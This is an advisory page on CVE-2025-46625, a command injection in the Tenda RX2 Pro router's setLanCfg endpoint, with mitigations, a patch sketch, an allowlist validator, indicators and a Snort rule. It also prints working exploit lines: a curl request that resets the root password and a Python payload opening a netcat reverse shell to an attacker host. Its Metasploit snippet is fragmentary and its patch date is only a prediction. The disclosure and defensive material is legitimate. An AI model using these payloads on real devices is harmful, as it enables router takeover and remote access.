Tenda RX2 Pro, Command Injection, CVE-2025-46625 (Critical)

How CVE-2025-46625 Works

The vulnerability exists in the `setLanCfg` API endpoint of the Tenda RX2 Pro’s HTTP server (httpd). Due to improper input validation, an authenticated attacker can inject malicious commands into the LAN configuration parameters. When these commands are processed and saved to the device’s persistent configuration, they execute with root privileges. The crafted payload bypasses input filters by embedding OS commands within legitimate HTTP POST parameters, which are then executed via system() calls in the backend. This allows persistent root access even after device reboots since the malicious commands remain in the configuration file.

DailyCVE Form

Platform: Tenda RX2 Pro
Version: 16.03.30.14
Vulnerability: Command Injection
Severity: Critical
Date: 05/27/2025

Prediction: Patch expected by 07/15/2025

What Undercode Say:

Exploitation Commands

curl -X POST -d "lanIP=192.168.1.1;$(echo 'root:toor' | chpasswd)" http://target_ip/goform/setLanCfg

import requests
payload = {"lanIP": "1.1.1.1; nc -e /bin/sh attacker_ip 4444"}
requests.post("http://target_ip/goform/setLanCfg", data=payload)

Mitigation Steps

  1. Block unauthorized access to `/goform/setLanCfg` via firewall rules.
  2. Apply input sanitization for special characters (;, &, |) in the `lanIP` parameter.
  3. Use firmware version 16.03.30.15 or later (post-patch).

Detection Script

grep -r "system(\"" /www/cgi-bin/

Patch Analysis

The vendor mitigates this by:

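// Old vulnerable code: lanIP is interpolated into a shell command line
char cmd[128];
snprintf(cmd, sizeof(cmd), "ifconfig br0 %s", lanIP);
system(cmd);
// Patched version: validate, then exec with an argument vector (no shell)
sanitize_input(lanIP);
char *const argv[] = { "ifconfig", "br0", lanIP, NULL };
// execve replaces the calling process, so it belongs in a forked child
execve("/sbin/ifconfig", argv, NULL);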
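
One way the `sanitize_input` step in the patch sketch above could be written as an allowlist instead of a blocklist of ;, & and |. This is an added example, not the vendor's code or code from the original page; the function names `lan_ip_is_valid` and `apply_lan_ip` are hypothetical, while `br0` and `/sbin/ifconfig` are taken from the snippet above.

```c
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical validator: 1 only for a plain dotted-quad IPv4 address. */
int lan_ip_is_valid(const char *s)
{
    struct in_addr addr;
    size_t len = s ? strlen(s) : 0;

    if (len < 7 || len > 15)            /* "0.0.0.0" .. "255.255.255.255" */
        return 0;
    /* Allowlist: digits and dots only, so no shell metacharacter, space
     * or newline can reach the saved configuration or a command line. */
    if (strspn(s, "0123456789.") != len)
        return 0;
    return inet_pton(AF_INET, s, &addr) == 1;   /* four octets, each 0-255 */
}

/* Hypothetical caller: validate, then run ifconfig with no shell involved.
 * Returns ifconfig's exit status, or -1 if the value is rejected or on error. */
int apply_lan_ip(const char *lan_ip)
{
    int status;
    pid_t pid;

    if (!lan_ip_is_valid(lan_ip))
        return -1;                      /* reject before saving or executing */
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "ifconfig", "br0", (char *)lan_ip, NULL };
        execv("/sbin/ifconfig", argv);
        _exit(127);                     /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* Constructed inputs: one valid address, one carrying a separator. */
    printf("%d %d\n", lan_ip_is_valid("192.168.1.1"), lan_ip_is_valid("192.168.1.1;x"));
    return 0;
}
```

Because the value is checked before it is stored, a rejected `lanIP` never reaches the persistent configuration, which is what lets the injected command survive reboots in the vulnerable firmware.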

Network Indicators

  • HTTP POST requests containing ;, &&, or backticks in `lanIP` parameter.
  • Unusual outbound connections from the router to external IPs.

Forensic Artifacts

  • Modified `/etc/config/lan_cfg` with embedded commands.
  • Suspicious entries in /var/log/httpd.log.

Metasploit Module Snippet

'Payload' => { 'lanIP' => "%s; echo '{payload.encoded}' > /tmp/e" }

Snort Rule

alert tcp any any -> $HOME_NET 80 (msg:"Tenda RX2 Pro CVE-2025-46625 Exploit"; flow:to_server,established; content:"POST /goform/setLanCfg"; pcre:"/lanIP=[^&]*([\x3b\x7c\x60]|%3b|%7c|%60|%26)/i"; sid:100025;)

Firmware Downgrade Prevention

fw_setenv allow_downgrade 0

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
